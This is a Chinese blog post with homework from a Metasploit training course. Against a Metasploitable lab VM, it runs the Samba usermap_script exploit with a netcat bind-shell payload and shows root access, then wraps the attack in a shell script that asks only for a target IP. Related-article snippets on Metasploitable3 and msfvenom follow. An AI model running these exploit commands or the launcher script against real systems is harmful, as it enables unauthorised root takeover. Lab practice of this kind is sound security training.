metsploit魔鬼训练营第一章作业

最新推荐文章于 2024-08-03 21:27:48 发布
最新推荐文章于 2024-08-03 21:27:48 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: metasploit魔鬼训练营笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37641759/article/details/72859083
版权

实验一:通过攻击samba服务漏洞控制linux靶机

目标ip:192.168.232.134

metasploitable靶机下载地址:链接:http://pan.百度.com/s/1slHJcZV 密码:ndoj

实验环境:kali linux

kalimsfconsole 

msf > use exploit/multi/samba/usermap_script 

msf exploit(usermap_script) > set payload cmd/unix/bind_netcat

msf exploit(usermap_script) > show options 


Module options (exploit/multi/samba/usermap_script):


   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

Payload options (cmd/unix/bind_netcat)

msf exploit(usermap_script) > set RHOST 192.168.232.134
RHOST => 192.168.232.134
msf exploit(usermap_script) > exploit 


   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address

Exploit target:


   Id  Name
   --  ----
   0   Automatic

msf exploit(usermap_script) > set RHOST 192.168.232.134
RHOST => 192.168.232.134
msf exploit(usermap_script) > exploit 

[*] Started bind handler
[*] Command shell session 1 opened (192.168.232.129:34139 -> 192.168.232.134:4444) at 2017-06-04 03:17:57 -0400

whoami 
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

ok

实验二:

用msfcli命令编写shell脚本程序,实现用户只需要输入ip地址,即可使用usermap_script漏洞渗透攻击模块


msfcli已经被取代,建议使用msfconsole  -x

kali: vim  metasploit.shell

echo "请输入目标ip"

read ip
msfconsole -x "use exploit/multi/samba/usermap_script;set payload cmd/unix/bind_netcat;set RHOST $ip;exploit"

kali:chomd a+x  metasploit.shell

kali:./metasploit







sky_seeker
关注
专栏目录
Metsploit-Unleashed
10-24
Metsploit-Unleashed,很好的学习资料
Metasploit魔鬼训练营第一章实践作业
qq_39596232的博客
03-31 482
1、搜集Samba服务usermap_script安全漏洞的相关信息: 下面是Back Track 5上面提供的相关信息: 同时也可以参考下面的网站: 我在必应上找到的感觉介绍还不错的网站,也可以参考下: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script 2、该安全漏洞的生命周期图: 暂时不...
metasploitable3靶机
雨泽网络工作室
08-23 1992
Metasploitable3靶机攻击 注:这些密码都是参考网站https://github.com/rapid7/metasploitable3/wiki/Configuration#credentials 21端口ftp 使用nmap扫描发现21端口打开 通过msfconsole 调出metasploit 使用ftp_login模块 使用set设置参数 使用run进行攻击 登录 22端口ssh 通过nmap扫描发现22端口开启 爆破s..
网络安全学习之利用Metasploit进行信息收集
最新发布
Aurevoirs的博客
08-03 876
利用metasploit 进行信息收集
Metasploitable3 + VMware 安装教程
mao_96的博客
07-06 4476
作为小白,最近在安装Metasploitable3,看了好多网上教程,发现基本都是相互复制粘贴的,一些坑并没有帮小白排掉,我把我的一些经验分享出来,希望能帮到大家。 首先,我是在win10上安装的,需要准备的环境: packer(建议安装1.3.5版) 我装了1.7版,遇到了问题,我按照下面这位博主的方法,并未能解决;最后还是装了1.3.5版本。 文章链接:https://blog.csdn.net/qq_42673052/article/details/112857816 由于我是Windows1
metasploit魔鬼训练营第一章实践作业
lilywang20119的博客
05-04 2414
1.搜索Samba服务usermap_script安全漏洞相关信息 根据下面的连接,搜索到如下内容: The time line is as follows: * May 7, 2007: Initial defect disclosure to the security@samba.org email alias. * May 7, 2007: Initial de
Metasploitable3渗透测试实战
温柔小薛的博客
02-17 4512
这是一个著名的靶场Metasploitable3,关于靶机搭建网上文章非常多,这里我就不再写了,但是关于漏洞挖掘没有什么文章,而且这个靶场windows版本和linux版本还有差别,我这里写一些简单的吧,自己就挖到这个程度了,有不对的地方还请前辈高人指点一二 目录1综述2.渗透过程2.1渗透路径说明2.1.1全端口扫描/服务发现2.1.2目录扫描2.1.3一、ProFTPD 1.3.5命令读取和写入任意文件。2.1.4二、sql注入2.1.5三、phpmyadmin远程php代码执行2.1.6四、文件上传漏
基于Ubuntu系统-渗透MySQL数据库.docx
10-19
在实验中,我们需要准备两个虚拟机,一个是Kali虚拟机,另一个是Ubuntu虚拟机。这两个虚拟机位于同一个网段中,以便进行渗透测试。 二、实验过程 1. 安装MySQL数据库 在Ubuntu虚拟机中,我们需要安装MySQL数据库...
Shellsploit注入器简单利用
大方子
09-06 2301
        Shellsploit让您为各种操作系统生成自定义的shellcode,后门,注入器。让我们通过编码器对每个字节进行混淆。 github:  https://github.com/vasco2016/shellsploit-framework 依赖安装 root$ sudo pip install capstone root$ sudo pip install rea...
metasploitable2靶机
雨泽网络工作室
08-16 4906
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
Samba的usermap_script(CVE-2007-2447)漏洞整理
野原新之助
12-14 1781
Username map script 是 Samba 协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行
安装metasploit与针对usermap_script安全漏洞的渗透攻击
wanqianshao的博客
02-15 3627
Metasploit具有良好的跨平台性使其可以在Linux、Windows、Mac os上安装和使用 Windows安装:https://www.metasploit.com/download (官网安装) 下载默认C盘后系统变量Path中添加路径C:\metasploit-framework\bin 打开终端输入msfconsole linux上安装: 由于kali系统上自带metasploit框架,所以对于初学者极为方便 这里针对Linux metaspolitable 靶机环境 Samba服务的u
MSF(Metasploit)之usermap_script漏洞的利用
野原新之助
12-15 1126
Samba扩展 Samba开放端口如下: tcp:139、445端口 udp:137、138端口 端口及服务详细信息博文链接: Samba的usermap_script(CVE-2007-2447)漏洞整理 MSF渗透攻击 ...
渗透测试实例:Metasploitable3靶机
lxy123_com的博客
02-09 4057
实验环境:Kali虚拟机一台、4G运行,Metasploitable3靶机一台,IP地址192.168.22.20 实验目的:对Metasploitable3靶机进行渗透测试 实验步骤: (一),对靶机进行扫描 1,使用Neuss对靶机进行扫描
metasploit魔鬼训练营第一章笔记
电风
05-17 4070
利用metasploit攻击靶机 kali自带metasploit LINUX下启动方式 1.msfconsole 2.cd /usr/share/metasploit-framework/ ./msfconsole (自带更新程序) 一.控制台形式 (1)msfconsole进入控制台终端 (2)msf>help search,MSF终端会显示该命令的参数列表,包括每个参
[远控免杀]msf生成木马的信息储备
热门推荐
不忘初心,护天下安全!
08-09 1万+
1.msfvenom的命令使用 Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, --nopsled &l
Metaspliot 控制终端利用Samba漏洞渗透
qq_50854662的博客
05-29 434
Samba简介 Samba是linux和unix系统上实现smb协议的一个免费软件,由服务器及客户端程序构成,Samba是面向Linux和Unix环境的Windows互操作性套件。它适用于在可能包括Linux、Unix、Windows、macOS及其他操作系统的异构环境下工作的那些人。Samba使用服务器消息块(SMB)协议,Windows系统使用该协议相互联系。使用Samba,你可以让Linux系统将驱动器映射到Windows系统,可以让Windows系统将驱动器映射到Linux系统,不过后者的可能性大
metasploit获取shell之后进一步利用!metasploit+sessions
weixin_34060741的博客
11-30 1305
当你用metasploit成功的***一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用 当你看到了 [*] Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051) 这就代...
渗透之——Metasploit制作并运行自定义Meterpreper脚本
冰河的专栏
01-15 2243
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86494361 注意:运行此脚本的前提是我们已经经过一系列的渗透,成功拿下了Meterpreter命令行。 这个脚本将会检查我们当前用户是否为管理员用户,然后找到explorer.exe进程,并自动迁移到这个进程中。 具体脚本mymet.rb如下: ## # Author...
Metsploit等同的工具有哪些
05-03
Metasploit是一个非常流行的渗透测试工具,它有许多类似的工具,包括: 1. Nmap:用于网络扫描和主机发现的工具。 2. Burp Suite:用于测试Web应用程序的工具,包括漏洞扫描和攻击。 3. Wireshark:用于网络协议...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值